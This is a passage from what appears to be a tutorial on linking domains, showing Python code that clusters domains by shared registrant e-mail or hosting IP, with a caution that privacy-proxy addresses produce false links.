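    """Group domains by a shared `key` value, keeping only groups of two or more:
    a lone domain is not evidence of a link."""
    groups = defaultdict(set)
    for r in records:
        if r[key]:
            groups[r[key]].add(r["domain"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}

def linked_domains(text):
    """Pivot on registrant e-mail and on hosting IP, as the post does by hand."""
    records = parse_records(text)
    return {"by_email": cluster(records, "email"), "by_ip": cluster(records, "ip")}
```

Privacy-proxy addresses (domainsbyproxy, whoisguard and the like) will cluster unrelated domains together, so treat an e-mail pivot as a lead to confirm against hosting and content, not as proof of common ownership.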